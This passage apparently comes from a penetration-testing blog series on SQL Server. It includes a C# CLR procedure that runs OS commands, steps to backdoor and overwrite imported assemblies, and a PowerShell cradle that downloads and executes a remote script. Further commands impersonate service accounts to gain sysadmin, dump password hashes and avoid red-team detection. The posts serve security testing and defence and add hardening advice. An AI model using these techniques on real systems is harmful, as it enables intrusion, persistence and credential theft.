ACS, ACT7, AOM2, ARIS, AutodeskVault, BOSCHSQL, BPASERVER9, CADSQL, CDRDICOM, CODEPAL, CODEPAL08, CounterPoint, CSSQL05, DHLEASYSHIP, DPM, DVTEL, EASYSHIP, ECC, ECOPYDB, Emerson2012, HDPS, HPDSS, INSERTGT, INTRAVET, MYMOVIES, PCAMERICA, PRISM, RMSQLDATA, RTCLOCAL, SALESLOGIX, SIDEXIS_SQL, SQL2K5, STANDARDDEV2014, TEW_SQLEXPRESS, vocollect, VSDOTNET, VSQL

Wrap Up

In conclusion, make sure to take a close look at the third party applications you deploy in your environment. Hopefully this blog/tool will help security teams clean up default passwords associated with default SQL Server instances. Good luck and hack responsibly!

Attacking SQL Server CLR Assemblies

In this blog, I'll be expanding on the CLR assembly attacks developed by Lee Christensen and covered in Nathan Kirk's CLR blog series. I'll review how to create, import, export, and modify CLR assemblies in SQL Server with the goal of privilege escalation, OS command execution, and persistence. I'll also share a few new PowerUpSQL functions that can be used to execute the CLR attacks on a larger scale in Active Directory environments. Below is an overview of what will be covered. Feel free to jump ahead:

What is a Custom CLR Assembly in SQL Server?

For the sake of this blog, we’ll define a Common Language Runtime (CLR) assembly as a .NET DLL (or group of DLLs) that can be imported into SQL Server.  Once imported, the DLL methods can be linked to stored procedures and executed via TSQL.  The ability to create and import custom CLR assemblies is a great way for developers to expand the native functionality of SQL Server, but naturally it also creates opportunities for attackers.

How do I Make a Custom CLR DLL for SQL Server?

Below is a C# template for executing OS commands based on Nathan Kirk's work and a few nice Microsoft articles. Naturally, you can make whatever modifications you want, but once you're done, save the file to "c:\temp\cmd_exec.cs".
using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using Microsoft.SqlServer.Server;
using System.IO;
using System.Diagnostics;
using System.Text;

public partial class StoredProcedures
{
    [Microsoft.SqlServer.Server.SqlProcedure]
    public static void cmd_exec (SqlString execCommand)
    {
        Process proc = new Process();
        proc.StartInfo.FileName = @"C:\Windows\System32\cmd.exe";
        proc.StartInfo.Arguments = string.Format(@" /C {0}", execCommand.Value);
        proc.StartInfo.UseShellExecute = false;
        proc.StartInfo.RedirectStandardOutput = true;
        proc.Start();

        // Create the record and specify the metadata for the columns.
        SqlDataRecord record = new SqlDataRecord(new SqlMetaData("output", SqlDbType.NVarChar, 4000));
        
        // Mark the beginning of the result set.
        SqlContext.Pipe.SendResultsStart(record);

        // Set values for each column in the row
        record.SetString(0, proc.StandardOutput.ReadToEnd().ToString());

        // Send the row back to the client.
        SqlContext.Pipe.SendResultsRow(record);
        
        // Mark the end of the result set.
        SqlContext.Pipe.SendResultsEnd();
        
        proc.WaitForExit();
        proc.Close();
    }
};
Now the goal is to simply compile "c:\temp\cmd_exec.cs" to a DLL using the csc.exe compiler. Even if you don't have Visual Studio installed, the csc.exe compiler ships with the .NET Framework by default, so it should be on your Windows system somewhere. Below is a PowerShell command to help find it.
Get-ChildItem -Recurse "C:\Windows\Microsoft.NET\" -Filter "csc.exe" | Sort-Object fullname -Descending | Select-Object -First 1 -ExpandProperty fullname
Assuming you found csc.exe, you can compile the "c:\temp\cmd_exec.cs" file to a DLL with a command similar to the one below.
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library c:\temp\cmd_exec.cs
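As an alternative to calling csc.exe directly, you may be able to compile the same source with PowerShell's Add-Type. This is a sketch under the assumption that the Microsoft.SqlServer.Server types resolve from System.Data.dll on your .NET Framework install; verify the reference list if the compile complains.
# Sketch: compile cmd_exec.cs to a DLL using Add-Type instead of csc.exe.
# Assumes the Microsoft.SqlServer.Server types resolve from System.Data.dll.
Add-Type -Path "c:\temp\cmd_exec.cs" -ReferencedAssemblies "System.Data" -OutputAssembly "c:\temp\cmd_exec.dll"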

How Do I Import My CLR DLL into SQL Server?

To import your new DLL into SQL Server, your SQL login will need sysadmin privileges, the CREATE ASSEMBLY permission, or the ALTER ASSEMBLY permission. Follow the steps below to register your DLL and link it to a stored procedure so the cmd_exec method can be executed via TSQL. Log into your SQL Server as a sysadmin and issue the TSQL queries below.
-- Select the msdb database
use msdb

-- Enable show advanced options on the server
sp_configure 'show advanced options',1
RECONFIGURE
GO

-- Enable clr on the server
sp_configure 'clr enabled',1
RECONFIGURE
GO

-- Import the assembly
CREATE ASSEMBLY my_assembly
FROM 'c:\temp\cmd_exec.dll'
WITH PERMISSION_SET = UNSAFE;

-- Link the assembly to a stored procedure
CREATE PROCEDURE [dbo].[cmd_exec] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [my_assembly].[StoredProcedures].[cmd_exec];
GO
Now you should be able to execute OS commands via the “cmd_exec” stored procedure in the “msdb” database as shown in the example below.

When you’re done, you can remove the procedure and assembly with the TSQL below.
DROP PROCEDURE cmd_exec
DROP ASSEMBLY my_assembly

How Do I Convert My CLR DLL into a Hexadecimal String and Import It Without a File?

If you read Nathan Kirk’s original blog series, you already know that you don’t have to reference a physical DLL when importing CLR assemblies into SQL Server. "CREATE ASSEMBLY" will also accept a hexadecimal string representation of a CLR DLL file. Below is a PowerShell script example showing how to convert your "cmd_exec.dll" file into a TSQL command that can be used to create the assembly without a physical file reference.
# Target file
$assemblyFile = "c:\temp\cmd_exec.dll"

# Build top of TSQL CREATE ASSEMBLY statement
$stringBuilder = New-Object -Type System.Text.StringBuilder 
$stringBuilder.Append("CREATE ASSEMBLY [my_assembly] AUTHORIZATION [dbo] FROM `n0x") | Out-Null

# Read bytes from file
$fileStream = [IO.File]::OpenRead($assemblyFile)
while (($byte = $fileStream.ReadByte()) -gt -1) {
    $stringBuilder.Append($byte.ToString("X2")) | Out-Null
}

# Build bottom of TSQL CREATE ASSEMBLY statement
$stringBuilder.AppendLine("`nWITH PERMISSION_SET = UNSAFE") | Out-Null
$stringBuilder.AppendLine("GO") | Out-Null
$stringBuilder.AppendLine(" ") | Out-Null

# Build create procedure command
$stringBuilder.AppendLine("CREATE PROCEDURE [dbo].[cmd_exec] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [my_assembly].[StoredProcedures].[cmd_exec];") | Out-Null
$stringBuilder.AppendLine("GO") | Out-Null
$stringBuilder.AppendLine(" ") | Out-Null

# Create run os command
$stringBuilder.AppendLine("EXEC[dbo].[cmd_exec] 'whoami'") | Out-Null
$stringBuilder.AppendLine("GO") | Out-Null
$stringBuilder.AppendLine(" ") | Out-Null

# Create file containing all commands
$stringBuilder.ToString() -join "" | Out-File c:\temp\cmd_exec.txt
If everything went smoothly, the "c:\temp\cmd_exec.txt" file should contain the following TSQL commands. In the example, the hexadecimal string has been truncated, but yours should be much longer. ;)
-- Select the MSDB database
USE msdb

-- Enable clr on the server
Sp_Configure 'clr enabled', 1
RECONFIGURE
GO

-- Create assembly from ascii hex
CREATE ASSEMBLY [my_assembly] AUTHORIZATION [dbo] FROM 
0x4D5A90000300000004000000F[TRUNCATED]
WITH PERMISSION_SET = UNSAFE 
GO 

-- Create procedures from the assembly method cmd_exec
CREATE PROCEDURE [dbo].[cmd_exec] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [my_assembly].[StoredProcedures].[cmd_exec]; 
GO 

-- Run an OS command as the SQL Server service account
EXEC [dbo].[cmd_exec] 'whoami' 
GO
When you run the TSQL from the "c:\temp\cmd_exec.txt" file in SQL Server as a sysadmin, the output should look like this:

PowerUpSQL Automation

If you haven't used PowerUpSQL before, you can visit the setup page here. I made a PowerUpSQL function called "Create-SQLFileCLRDll" to create similar DLLs and TSQL scripts on the fly. It also supports options for setting custom assembly names, class names, method names, and stored procedure names. If none are specified, then they are all randomized. Below is a basic command example:
PS C:\temp> Create-SQLFileCLRDll -ProcedureName "runcmd" -OutFile runcmd -OutDir c:\temp
C# File: c:\temp\runcmd.csc
CLR DLL: c:\temp\runcmd.dll
SQL Cmd: c:\temp\runcmd.txt
Below is a short script for generating 10 sample CLR DLLs / CREATE ASSEMBLY TSQL scripts. It can come in handy when playing around with CLR assemblies in the lab.
1..10 | %{ Create-SQLFileCLRDll -Verbose -ProcedureName myfile$_ -OutDir c:\temp -OutFile myfile$_ }

How do I List Existing CLR Assemblies and CLR Stored Procedures?

You can use the TSQL query below to verify that your CLR assembly was set up correctly, or to start hunting for existing user-defined CLR assemblies. Note: This is a modified version of some code I found here.
USE msdb;
SELECT      SCHEMA_NAME(so.[schema_id]) AS [schema_name], 
            af.file_id,                          
            af.name + '.dll' as [file_name],
            asmbly.clr_name,
            asmbly.assembly_id,           
            asmbly.name AS [assembly_name], 
            am.assembly_class,
            am.assembly_method,
            so.object_id as [sp_object_id],
            so.name AS [sp_name],
            so.[type] as [sp_type],
            asmbly.permission_set_desc,
            asmbly.create_date,
            asmbly.modify_date,
            af.content                                           
FROM        sys.assembly_modules am
INNER JOIN  sys.assemblies asmbly
ON          asmbly.assembly_id = am.assembly_id
INNER JOIN  sys.assembly_files af 
ON         asmbly.assembly_id = af.assembly_id 
INNER JOIN  sys.objects so
ON          so.[object_id] = am.[object_id]
With this query we can see the file name, assembly name, assembly class name, the assembly method, and the stored procedure the method is mapped to.

You should see "my_assembly" in your results. If you ran the 10 TSQL queries generated from the "Create-SQLFileCLRDll" command I provided earlier, then you'll also see the associated assembly information for those assemblies.

PowerUpSQL Automation

I added a function for this in PowerUpSQL called “Get-SQLStoredProcedureCLR” that will iterate through accessible databases and provide the assembly information for each one. Below is a command sample.
Get-SQLStoredProcedureCLR -Verbose -Instance MSSQLSRV04\SQLSERVER2014 -Username sa -Password 'sapassword!' | Out-GridView
You can also execute it against all domain SQL Servers with the command below (provided you have the right privileges).
Get-SQLInstanceDomain -Verbose | Get-SQLStoredProcedureCLR -Verbose -Username sa -Password 'sapassword!' | Format-Table -AutoSize

Mapping Procedure Parameters

Attackers aren't the only ones creating unsafe assemblies. Sometimes developers create assemblies that execute OS commands or interact with operating system resources. As a result, targeting and reversing those assemblies can sometimes lead to privilege escalation bugs. For example, if our assembly already existed, we could try to determine the parameters it accepts and how to use them. Just for fun, let's use the query below to blindly determine what parameters the "cmd_exec" stored procedure takes.
SELECT            pr.name as procname,
                        pa.name as param_name, 
                        TYPE_NAME(system_type_id) as Type,
                        pa.max_length, 
                        pa.has_default_value,
                        pa.is_nullable 
FROM             sys.all_parameters pa
INNER JOIN         sys.procedures pr on pa.object_id = pr.object_id
WHERE             pr.type like 'pc' and pr.name like 'cmd_exec'
In this example, we can see that it only accepts one string parameter named "execCommand". An attacker targeting the stored procedure may be able to determine that it can be used for OS command execution.
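From there, a quick way to test that theory is to call the procedure with a harmless command. Below is a sketch using PowerUpSQL's Get-SQLQuery; the instance and credentials are the sample values used elsewhere in this post.
# Test the discovered procedure with a benign command
Get-SQLQuery -Verbose -Instance "MSSQLSRV04\SQLSERVER2014" -Username sa -Password 'sapassword!' -Query "EXEC msdb.dbo.cmd_exec 'whoami'"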

How Do I Export a CLR Assembly that Exists in SQL Server to a DLL?

Simply testing the functionality of existing CLR assembly procedures isn't our only option for finding escalation paths. In SQL Server, we can also export user-defined CLR assemblies back to DLLs. 😊 Let's talk about going from CLR identification to CLR source code! To start, we'll have to identify the assemblies, export them back to DLLs, and decompile them so they can be analyzed for issues (or modified to inject backdoors).

PowerUpSQL Automation

In the last section, we talked about how to list out CLR assemblies with the PowerUpSQL command below.
Get-SQLStoredProcedureCLR -Verbose -Instance MSSQLSRV04\SQLSERVER2014 -Username sa -Password 'sapassword!' | Format-Table -AutoSize
The same function supports an "ExportFolder" option. If you set it, the function will export the assemblies' DLLs to that folder. Below is an example command and sample output.
Get-SQLStoredProcedureCLR -Verbose -Instance MSSQLSRV04\SQLSERVER2014 -ExportFolder c:\temp -Username sa -Password 'sapassword!' | Format-Table -AutoSize
Once again, you can also export CLR DLLs on scale if you are a domain user and a sysadmin using the command below:
Get-SQLInstanceDomain -Verbose | Get-SQLStoredProcedureCLR -Verbose -Username sa -Password 'sapassword!' -ExportFolder c:\temp | Format-Table -AutoSize
DLLs can be found in the output folder. The script will dynamically build a folder structure based on each server name, instance, and database name.

Now you can view the source with your favorite decompiler. Over the last year I’ve become a big fan of dnSpy.  After reading the next section you’ll know why.

How do I Modify a CLR DLL and Overwrite an Assembly Already Imported into SQL Server?

Below is a brief overview showing how to decompile, view, edit, save, and reimport an existing SQL Server CLR DLL with dnSpy. You can download dnSpy from here. For this exercise, we are going to modify the cmd_exec.dll exported from SQL Server earlier.
  1. Open the cmd_exec.dll file in dnSpy. In the left panel, drill down until you find the “cmd_exec” method and select it. This will immediately allow you to review the source code and start hunting for bugs.

  2. Next, right-click the right panel containing the source code and choose "Edit Method (C#)…".

  3. Edit the code how you wish. However, in this example I added a simple "backdoor" that adds a file to the "c:\temp" directory every time the "cmd_exec" method is called. Example code and a screenshot are below.
    [SqlProcedure]
    public static void cmd_exec(SqlString execCommand)
    {
        Process expr_05 = new Process();
        expr_05.StartInfo.FileName = "C:\\Windows\\System32\\cmd.exe";
        expr_05.StartInfo.Arguments = string.Format(" /C {0}", execCommand.Value);
        expr_05.StartInfo.UseShellExecute = true;
        expr_05.Start();
        expr_05.WaitForExit();
        expr_05.Close();
        // Added "backdoor": drop a marker file every time cmd_exec runs
        Process expr_54 = new Process();
        expr_54.StartInfo.FileName = "C:\\Windows\\System32\\cmd.exe";
        expr_54.StartInfo.Arguments = " /C whoami > c:\\temp\\clr_backdoor.txt";
        expr_54.StartInfo.UseShellExecute = true;
        expr_54.Start();
        expr_54.WaitForExit();
        expr_54.Close();
    }
  4. Save the patched code by clicking the compile button. Then from the top menu choose File, Save Module….  Then click ok.

According to this Microsoft article, every time a CLR is compiled, a unique GUID is generated and embedded in the file header so that it’s possible to "distinguish between two versions of the same file".  This is referred to as the MVID (module version ID). To overwrite the existing CLR already imported into SQL Server, we’ll have to change the MVID manually. Below is an overview.
  1. Open "cmd_exec" in dnSpy, if it's not already open. Then drill down into the PE sections and select the "#GUID" storage stream. Then, right-click on it and choose "Show Data in Hex Editor".

  2. Next, all you have to do is modify one of the selected bytes with an arbitrary value.

  3. Select File from the top menu and choose “Save Module…”.

PowerShell Automation

You can use the raw PowerShell command I provided earlier, or you can use the PowerUpSQL command example below to obtain the hexadecimal bytes from the newly modified "cmd_exec.dll" file and generate the ALTER statement.
PS C:\temp> Create-SQLFileCLRDll -Verbose -SourceDllPath .\cmd_exec.dll
VERBOSE: Target C#  File: NA
VERBOSE: Target DLL File: .\cmd_exec.dll
VERBOSE: Grabbing bytes from the dll
VERBOSE: Writing SQL to: C:\Users\SSUTHE~1\AppData\Local\Temp\CLRFile.txt
C# File: NA
CLR DLL: .\cmd_exec.dll
SQL Cmd: C:\Users\SSUTHE~1\AppData\Local\Temp\CLRFile.txt
The new CLRFile.txt should look something like the statement below.
-- Choose the msdb database
use msdb
-- Alter the existing CLR assembly
ALTER ASSEMBLY [my_assembly] FROM 
0x4D5A90000300000004000000F[TRUNCATED]
WITH PERMISSION_SET = UNSAFE 
GO
The ALTER statement is used to replace the existing CLR instead of DROP and CREATE. As Microsoft puts it, “ALTER ASSEMBLY does not disrupt currently running sessions that are running code in the assembly being modified. Current sessions complete execution by using the unaltered bits of the assembly.” So, in summary, nothing goes boom.  The TSQL query execution should look something like the screenshot below.

To check if your code modification worked, run the "cmd_exec" stored procedure and verify that the "c:\temp\clr_backdoor.txt" file was created.

Can I Escalate Privileges in SQL Server using a Custom CLR?

The short answer is yes, but there are some unlikely conditions that must be met first. If your SQL Server login is not a sysadmin, but has the CREATE or ALTER ASSEMBLY permission, you may be able to obtain sysadmin privileges using a custom CLR that executes OS commands under the context of the SQL Server service account (which is a sysadmin by default). However, for that to be successful, the database you create the CLR assembly in must have the 'is_trustworthy' flag set to '1', and the 'clr enabled' server setting must be turned on. By default, only the msdb database is trustworthy, and the 'clr enabled' setting is disabled. :P

I've never seen the CREATE or ALTER ASSEMBLY permissions assigned explicitly to a SQL login. However, I have seen application SQL logins added to the 'db_ddladmin' database role, and that role does have the 'ALTER ASSEMBLY' permission. Note: SQL Server 2017 introduced the 'clr strict security' configuration. Microsoft documentation states that the setting needs to be disabled to allow the creation of UNSAFE or EXTERNAL assemblies.
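If you want to check for those preconditions on a target instance, the queries below should do it. This is a sketch using PowerUpSQL's Get-SQLQuery with the sample connection details from earlier in this post; note that the catalog column is named is_trustworthy_on.
# Find databases flagged as trustworthy (msdb is expected by default)
Get-SQLQuery -Instance "MSSQLSRV04\SQLSERVER2014" -Username sa -Password 'sapassword!' -Query "SELECT name, is_trustworthy_on FROM sys.databases WHERE is_trustworthy_on = 1"

# Check whether CLR is enabled at the server level (0 = disabled)
Get-SQLQuery -Instance "MSSQLSRV04\SQLSERVER2014" -Username sa -Password 'sapassword!' -Query "SELECT name, value_in_use FROM sys.configurations WHERE name = 'clr enabled'"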

Wrap Up

In this blog, I showed a few ways CLR assemblies can be abused, and how some of those tasks, such as exporting CLR assemblies, can be done at scale using PowerUpSQL. It's worth noting that all of the techniques shown can be logged and tied to alerts using native SQL Server functionality, but I'll have to cover that another day. In the meantime, have fun and hack responsibly! PS: Don't forget that all of the attacks shown can also be executed via SQL injection with a little manual effort/automation.

How to get SQL Server Sysadmin Privileges as a Local Admin with PowerUpSQL

In this blog, I outline common techniques that can be used to leverage the SQL Server service account to escalate privileges from a local administrator to a SQL Server sysadmin (DBA). I also share a few PowerUpSQL functions that I worked on with Mike Manzotti (@mmanzo_) to perform SQL Server service account impersonation by wrapping Joe Bialek's (@JosephBialek) wonderful Invoke-TokenManipulation function.

SQL Server Service Account Overview

At its core, SQL Server is just another Windows application. In the case of SQL Server, every instance installs as a set of Windows services that run in the background. Each of those Windows services is configured to run with a Windows account. The associated Windows account is then used for all interaction with the operating system. The primary Windows service behind SQL Server is the "SQL Server (Instance)" service, which runs sqlservr.exe. Typically, the instance name is baked into the service name. For the sake of illustration, here is what three instances installed on the same system look like in services.msc.


SQL Server Service Account Types

SQL Server services can be configured with many types of Windows accounts. Naturally, the type of Windows account chosen can dramatically affect the impact in the event that a SQL Server is compromised. Below are some common service account types:
  • LocalSystem
  • NetworkService
  • Local user account
  • Managed service account
  • Domain user account
  • Domain admin account
So…impersonating the service account could potentially land you Domain Admin privileges. However, that's not the goal of today's exercise. ;)

If you only remember one thing from this blog, it should be: regardless of a SQL Server service account's privileges on the operating system, it has sysadmin privileges in SQL Server by default. That is true of every SQL Server version (that I'm aware of). Now, let's talk about how to get that sysadmin access as a local administrator or Domain Admin.

How do I impersonate the SQL Server Service Account?

Below are some common methods for impersonating SQL Server service accounts or acquiring their passwords if you have local or domain administrator privileges. Note: All of the techniques focus on the operating system level. However, a local administrator could also obtain sysadmin privileges from a least privilege SQL Server login using SQL Server layer vulnerabilities. For those who are curious about which versions of SQL Server are affected by which techniques, I've provided a list below:

How do I impersonate the SQL Server Service Account using PowerUpSQL?

Now that we’ve touched on the common techniques and tools, below are a few handy functions for impersonating the SQL Server service account with PowerUpSQL. Note: Once again, these functions just wrap around Joe Bialek's Invoke-TokenManipulation function.

Invoke-SQLImpersonateService

Invoke-SQLImpersonateService can be used to impersonate a SQL Server service account based on an instance name.  This can come in handy when you’re a local admin on a box and want to be able to run all the PowerUpSQL functions as a sysadmin against a local SQL Server instance. Below is a basic example.
  1. Log into the target system as a local or domain administrator. Then verify who you are.
    PS C:\> whoami
    
    demo\administrator
  2. Next load the PowerShell module PowerUpSQL.
    PS C:\> IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1")
  3. List the first available SQL Server instance on the local system.
    PS C:\> Get-SQLInstanceLocal | Select-Object -First 1
    ComputerName       : MSSQLSRV04
    Instance           : MSSQLSRV04\BOSCHSQL
    ServiceDisplayName : SQL Server (BOSCHSQL)
    ServiceName        : MSSQL$BOSCHSQL
    ServicePath        : "C:\Program Files\Microsoft SQL Server\MSSQL12.BOSCHSQL\MSSQL\Binn\sqlservr.exe" -sBOSCHSQL
    ServiceAccount     : NT Service\MSSQL$BOSCHSQL
    State              : Running
  4. Verify that the local administrator does not have sysadmin privileges on the local SQL Server instance using the Get-SQLServerInfo function.
    PS C:\> Get-SQLServerInfo -Verbose -Instance MSSQLSRV04\BOSCHSQL
    
    VERBOSE: MSSQLSRV04\BOSCHSQL : Connection Success.
    
    ComputerName           : MSSQLSRV04
    Instance               : MSSQLSRV04\BOSCHSQL
    DomainName             : DEMO
    ServiceProcessID       : 1620
    ServiceName            : MSSQL$BOSCHSQL
    ServiceAccount         : NT Service\MSSQL$BOSCHSQL
    AuthenticationMode     : Windows and SQL Server Authentication
    Clustered              : No
    SQLServerVersionNumber : 12.0.4100.1
    SQLServerMajorVersion  : 2014
    SQLServerEdition       : Developer Edition (64-bit)
    SQLServerServicePack   : SP1
    OSArchitecture         : X64
    OsVersionNumber        : 6.2
    CurrentLogin           : DEMO\Administrator
    IsSysadmin             : No
    ActiveSessions         : 1
    You should notice that the “CurrentLogin” is your current user account, and “IsSysadmin” is “No”.
  5. Impersonate the SQL Server service account for the target instance.
    PS C:\> Invoke-SQLImpersonateService -Verbose -Instance MSSQLSRV04\BOSCHSQL
    
    VERBOSE: MSSQLSRV04\BOSCHSQL : DEMO\administrator has local admin privileges.
    VERBOSE: MSSQLSRV04\BOSCHSQL : Impersonating SQL Server process:
    VERBOSE: MSSQLSRV04\BOSCHSQL : - Process ID: 1620
    VERBOSE: MSSQLSRV04\BOSCHSQL : - Service Account: NT Service\MSSQL$BOSCHSQL
    VERBOSE: MSSQLSRV04\BOSCHSQL : Successfully queried thread token
    VERBOSE: MSSQLSRV04\BOSCHSQL : Successfully queried thread token
    VERBOSE: MSSQLSRV04\BOSCHSQL : Selecting token by Process object
    VERBOSE: MSSQLSRV04\BOSCHSQL : Done.
  6. Verify that impersonating the SQL Server service account for the target instance was successful by running the Get-SQLServerInfo command.
    PS C:\> Get-SQLServerInfo -Verbose -Instance MSSQLSRV04\BOSCHSQL
    
    VERBOSE: MSSQLSRV04\BOSCHSQL : Connection Success.
    ComputerName           : MSSQLSRV04
    Instance               : MSSQLSRV04\BOSCHSQL
    DomainName             : DEMO
    ServiceProcessID       : 1620
    ServiceName            : MSSQL$BOSCHSQL
    ServiceAccount         : NT Service\MSSQL$BOSCHSQL
    AuthenticationMode     : Windows and SQL Server Authentication
    Clustered              : No
    SQLServerVersionNumber : 12.0.4100.1
    SQLServerMajorVersion  : 2014
    SQLServerEdition       : Developer Edition (64-bit)
    SQLServerServicePack   : SP1
    OSArchitecture         : X64
    OsMachineType          : ServerNT
    OSVersionName          : Windows Server 2012 Standard
    OsVersionNumber        : 6.2
    CurrentLogin           : NT Service\MSSQL$BOSCHSQL
    IsSysadmin             : Yes
    ActiveSessions         : 1
    You should notice that the “CurrentLogin” is now the SQL Server service account, and “IsSysadmin” is now “Yes”.  At this point, any PowerUpSQL function you run will be in a sysadmin context. :)
  7. Once you're all done doing what you need to do, revert to your original user context with the command below.
    PS C:\> Invoke-SQLImpersonateService -Verbose -Rev2Self
Below is a short demo video: https://www.netspi.com/wp-content/uploads/2017/05/PowerUpSQL-7-Escalating-Local-Admin-to-Sysadmin.mp4

Invoke-SQLImpersonateServiceCmd

Below is an example showing how to quickly start cmd.exe in the context of each SQL Server service account associated with the instance MSSQLSRV04\BOSCHSQL. It's a little silly, but it seems to be an effective way to illustrate risk around SQL Server service accounts during demos.
PS C:\> Invoke-SQLImpersonateServiceCmd -Instance MSSQLSRV04\BOSCHSQL

Note: The verbose flag will give you more info if you need it.

MSSQLSRV04\BOSCHSQL - Service: SQL Full-text Filter Daemon Launcher (BOSCHSQL) - Running command "cmd.exe" as NT Service\MSSQLFDLauncher$BOSCHSQL
MSSQLSRV04\BOSCHSQL - Service: SQL Server Reporting Services (BOSCHSQL) - Running command "cmd.exe" as NT Service\ReportServer$BOSCHSQL
MSSQLSRV04\BOSCHSQL - Service: SQL Server Analysis Services (BOSCHSQL) - Running command "cmd.exe" as NT Service\MSOLAP$BOSCHSQL
MSSQLSRV04\BOSCHSQL - Service: SQL Server (BOSCHSQL) - Running command "cmd.exe" as NT Service\MSSQL$BOSCHSQL

All done.

When the function is done running you should have a cmd.exe window for each of the services.

Note: You can also set a custom command to run using the -Exec parameter.
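For example, the one-liner below would launch PowerShell instead of cmd.exe under each service account; the -Exec value is just an illustration.
# Example: run a custom command under each SQL Server service account
Invoke-SQLImpersonateServiceCmd -Instance MSSQLSRV04\BOSCHSQL -Exec "powershell.exe"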

Get-SQLServerPasswordHash

Mike Manzotti (@mmanzo_) was nice enough to write a great function for pulling SQL Server login password hashes. It can be quite handy during penetration tests when searching for commonly shared account passwords. He also added a -Migrate switch to automatically escalate to sysadmin if you're executing against a local instance with local administrator privileges.
PS C:\> Get-SQLServerPasswordHash -Verbose -Instance MSSQLSRV04\BOSCHSQL -Migrate

VERBOSE: MSSQLSRV04\BOSCHSQL : Connection Success.
VERBOSE: MSSQLSRV04\BOSCHSQL : You are not a sysadmin.
VERBOSE: MSSQLSRV04\BOSCHSQL : DEMO\administrator has local admin privileges.
VERBOSE: MSSQLSRV04\BOSCHSQL : Impersonating SQL Server process:
VERBOSE: MSSQLSRV04\BOSCHSQL : - Process ID: 1568
VERBOSE: MSSQLSRV04\BOSCHSQL : - ServiceAccount: NT Service\MSSQL$BOSCHSQL
VERBOSE: MSSQLSRV04\BOSCHSQL : Successfully queried thread token
VERBOSE: MSSQLSRV04\BOSCHSQL : Successfully queried thread token
VERBOSE: MSSQLSRV04\BOSCHSQL : Selecting token by Process object
VERBOSE: MSSQLSRV04\BOSCHSQL : Attempting to dump password hashes.
VERBOSE: MSSQLSRV04\BOSCHSQL : Attempt complete.
VERBOSE: 3 password hashes recovered.

ComputerName        : MSSQLSRV04
Instance            : MSSQLSRV04\BOSCHSQL
PrincipalId         : 1
PrincipalName       : sa
PrincipalSid        : 1
PrincipalType       : SQL_LOGIN
CreateDate          : 4/8/2003 9:10:35 AM
DefaultDatabaseName : master
PasswordHash        : 0x0200698883dbec3fb88c445d43b99794043453384d13659ce72fc907af5a34534563c1624d935279f6447be9ec44467d4d1ef56d8e14a91fe183450520f560c2

[TRUNCATED]
Note: Mike also mentioned that it’s been working well remotely over WMI. :)

General Recommendations

Below are some basic recommendations that can be used to reduce the risk of the common escalation techniques outlined in this blog.
  • Upgrade to Windows Server 2012 or greater to support common OS controls.
  • Upgrade to SQL Server 2012 or greater to support common SQL Server controls.
  • Do not allow the storage of wdigest passwords in memory.
  • Do enable process protection.
  • Do use managed service accounts for standalone SQL Servers.
  • Do use least privilege domain accounts for clustered SQL Servers.
  • "Run separate SQL Server services under separate Windows accounts. Whenever possible, use separate, low-rights Windows or Local user accounts for each SQL Server service." For more information, see Configure Windows Service Accounts and Permissions.
  • Consider running endpoint protection that can identify common remote code injection techniques. *I am aware that nobody wants to put performance-impacting software on a database server.  :)
  • More from Microsoft here
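For the WDigest item above, the setting lives in the registry. Below is a minimal sketch that disables WDigest credential caching; it assumes the standard UseLogonCredential value and requires local administrator privileges:
# Stop the WDigest provider from caching plaintext credentials in memory
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" -Name UseLogonCredential -Value 0 -Type DWord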
I would love to say “Simply remove the SQL Server service account from the Sysadmin fixed server role”, but I haven’t done enough testing to feel comfortable with that recommendation. As of right now it is a mystery to me why the service account is a sysadmin by default.  If anyone knows why, or has additional mitigating control recommendations, please let me know.

Wrap Up

In this blog, I outlined common techniques that can be used to escalate privileges from a local Windows administrator to a SQL Server sysadmin (DBA).  I’ve also shared a few new PowerUpSQL functions that wrap the Invoke-TokenManipulation function to help make the job easier.  Hopefully they’ll be helpful. Have fun and hack responsibly!

Common Red Team Techniques vs Blue Team Controls Infographic

Despite the large investment many companies have made in detective controls, it’s still pretty common for us to take over an entire network during a penetration test or red team engagement, and never trigger a single response ticket. Naturally this has generated some concern at the CSO level as to whether or not a real breach would be detected.

Testing the effectiveness of detective and preventative controls can be a challenge. However, the process can be a lot easier if common attack workflows are understood and broken into manageable pieces. In this blog, I’ll share an infographic that illustrates some common red team attack workflows and blue team controls to help get you started.

Disclaimer: Unfortunately, it’s a pain to get lots of information into one diagram. So it only represents common phishing attack workflows and should not be considered complete or comprehensive. The tools, techniques, and procedures used by attackers are constantly evolving and changing, so there is just not enough room on the page to fit it all in.

Hopefully the information will be interesting to security teams in the process of building out and testing their preventative and detective capabilities.

Infographic Download

You can download the infographic here. And learn more about NetSPI's red team security services here.

Also, below are some general tips for red and blue teams who are just getting their feet wet. They’ve helped me out a lot in the past.

General Red Team Tips

Below are a few general tips for avoiding detection during red team engagements.

  1. Do not perform large scanning operations.
  2. Do not perform online dictionary attacks.
  3. Do perform recon locally and on the network.
  4. Do perform targeted attacks based on recon data.
  5. Do not use common attack tools. Especially on disk.
  6. Do try to stay off disk when possible.
  7. Do try to operate as a normal user or application.
  8. Do try to use native technologies to access the environment remotely without a C2. If C2 is required, the use of beaconing, tunneling, and side channels typically goes undetected.
  9. Do not change major configuration states.
  10. Do not create accounts.

General Blue Team Detective Control Tips

Below are a few general tips for detecting unskilled attackers.

  1. Define clear detective control boundaries.
    It may be cliché, but detection in depth is as important as defense in depth these days. Make sure to have a good understanding of all the layers of your environment and define clear detective control boundaries. This should include, but is not limited to, networks, endpoints, applications, and databases. Also, don’t neglect your internal processes and intelligence feeds. They can be handy when trying to evaluate context and risk.
  2. Map out your data and logging sources for each layer of the environment.
    You may have information that can be used to detect IoAs and IoCs that you were unaware of. Having a solid understanding of what information is available will allow you to be a more adaptive blue team.
  3. Find solutions based on value, not price.
